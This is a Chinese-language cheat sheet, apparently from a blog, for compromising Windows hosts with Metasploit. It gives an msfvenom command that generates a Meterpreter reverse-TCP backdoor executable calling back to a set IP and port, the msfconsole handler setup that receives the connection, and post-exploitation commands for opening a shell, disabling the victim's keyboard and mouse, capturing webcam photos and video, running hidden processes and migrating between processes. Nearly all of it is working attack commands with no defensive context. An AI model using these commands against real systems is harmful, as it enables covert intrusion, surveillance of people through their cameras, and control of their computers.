赞
踩
生成后门
- msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.100.222 lport=1111 -f exe >
- /home/share/1111.exe
生成监听器
- msfconsole
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- set lhost 0.0.0.0
- set lport 1111
- run
在被入侵的主机上,执行后门后,此时会发现上线成功
基本系统命令
- background #将当前会话放置后台,然后可以再运行其他模块进行提权
- sessions #sessions –h 查看帮助
- sessions -i <ID值> #进入会话 -k 杀死会话
- getuid # 查看权限
- getpid # 获取当前进程的pid
- sysinfo # 查看目标机系统信息
- ps # 查看当前活跃进程 kill <PID值> 杀死进程
- idletime #查看目标机发呆(无操作)时间
- reboot / shutdown #重启/关机
- shell #进入目标机cmd shell
uictl开关键盘、鼠标
- uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标
- uictl disable mouse #禁用鼠标
- uictl disable keyboard #禁用键盘
webcam摄像头命令
- webcam_list #查看摄像头
- webcam_snap #通过摄像头拍照
- webcam_stream #通过摄像头开启视频
执行exe文件
- execute -f #命令在目标主机上执行应用程序
- execute -f c:\\111.exe
- execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
migrate进程迁移
- getpid # 获取当前进程的pid
- ps # 查看当前活跃进程
- migrate <pid值> #将Meterpreter会话移植到指定pid值进程中,
- kill <pid值> #杀死进程
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。